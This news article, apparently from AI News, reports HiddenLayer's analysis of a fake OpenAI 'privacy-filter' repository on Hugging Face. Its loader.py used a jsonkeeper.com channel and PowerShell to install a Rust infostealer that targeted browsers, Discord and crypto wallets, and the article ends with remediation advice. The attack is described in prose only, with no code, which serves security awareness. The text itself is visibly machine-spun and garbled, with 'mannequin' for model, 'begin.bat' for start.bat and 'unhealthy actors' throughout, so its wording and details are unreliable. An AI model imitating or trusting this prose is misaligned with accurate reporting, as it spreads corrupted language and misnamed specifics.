Hugging Face hosted malicious software masquerading as OpenAI release
A malicious Hugging Face repository that posed as an OpenAI release delivered infostealer malware to Windows machines and recorded about 244,000 downloads earlier than removing, in accordance with analysis from AI safety agency HiddenLayer. The variety of downloads could have been artificially inflated by the attackers to make the mannequin appear extra widespread, so the extent of the results of the assault is unknown.
‘Open-OSS/privacy-filter’ imitated OpenAI’s Privacy Filter release. HiddenLayer mentioned the unique mannequin card had been copied almost precisely, and the unhealthy actors included a malicious loader.py file that fetched and ran credential-stealing malware on Windows hosts.
The repos reached the highest of the ‘trending’ listing on Hugging Face with 667 likes accrued in lower than 18 hours – once more, this determine could have been modified by the attackers.
Public AI mannequin registries could also be turning into dangers within the software provide chain as builders and knowledge scientists clone fashions instantly into company environments, environments which have entry to supply code, cloud credentials, and inner techniques. That scenario alone makes a compromised mannequin repository greater than a nuisance.
The README file for the faux mannequin carefully resembled that of the official venture, nevertheless it departed from the unique in that it instructed customers to run begin.bat on Windows or execute python loader.py on Linux and macOS, directions central to the an infection chain HiddenLayer described.
Researchers have beforehand warned that malicious code will be hidden inside AI mannequin information or associated setup scripts on Hugging Face and different public registries. Previous instances concerned Pickle-serialised mannequin information that bypassed platform scanners.
Malicious loader disguised as setup code
HiddenLayer mentioned loader.py started with decoy code that resembled a standard AI mannequin loader, transferring rapidly to a hid an infection chain. A script disabled SSL verification, decoded a base64-encoded URL linked to jsonkeeper.com, retrieved a distant payload instruction, and handed instructions to PowerShell on Windows machines. HiddenLayer mentioned using the command-and-control channel jsonkeeper.com allowed the attacker to rotate the payload with out altering the repo’s contents.
The PowerShell command then downloaded an extra batch file from an attacker-controlled area, and the malware established persistence by making a scheduled process designed to resemble a official Microsoft Edge replace course of.
The closing payload was a Rust-based infostealer. According to HiddenLayer, it focused Chromium and Firefox-derived browsers, Discord native storage, cryptocurrency wallets, FileZilla configurations, and host system info. The malware additionally tried to disable Windows Antimalware Scan Interface and Event Tracing.
Wider campaigns
HiddenLayer additionally mentioned it discovered six additional Hugging Face repositories containing nearly equivalent loader logic that shared infrastructure with the cited assault.
The case follows different warnings about malicious AI fashions on Hugging Face, together with poisoned AI SDKs and faux OpenClaw installers. The widespread thread is that attackers are treating AI growth workflows as a route into usually safe environments. AI repositories usually comprise executable code, setup directions, dependency information, notebooks, and scripts, and its these peripheral components that trigger the issues, quite than the fashions themselves.
Sakshi Grover, senior analysis supervisor for cybersecurity providers at IDC, mentioned conventional SCA was designed to examine dependency manifests, libraries, and container photographs. It is much less efficient at figuring out malicious loader logic in AI repositories. They additionally cited IDC’s November 2025 FutureScape report, which contained the decision that by 2027, 60% of agentic AI techniques ought to have a invoice of supplies. This would assist corporations monitor which AI artefacts they use, their supply, which variations had been accepted, and whether or not they comprise executable parts.
Response and mitigation
HiddenLayer suggested anybody who cloned Open-OSS/privacy-filter and ran begin.bat, python loader.py or any file from the repository on a Windows host to deal with the system as compromised, and recommends re-imaging techniques. Browser classes ought to thought-about compromised even when passwords usually are not held regionally, as session cookies let attackers bypass MFA in some circumstances.
Hugging Face has confirmed the repo has been eliminated.
(Image supply: Pixabay, beneath licence.)
Want to study extra about AI and large knowledge from trade leaders? Check out AI & Big Data Expo happening in Amsterdam, California, and London. The complete occasion is a part of TechEx and co-located with different main expertise occasions. Click here for extra info.
AI News is powered by TechForge Media. Explore different upcoming enterprise expertise occasions and webinars here.
The publish Hugging Face hosted malicious software masquerading as OpenAI release appeared first on AI News.
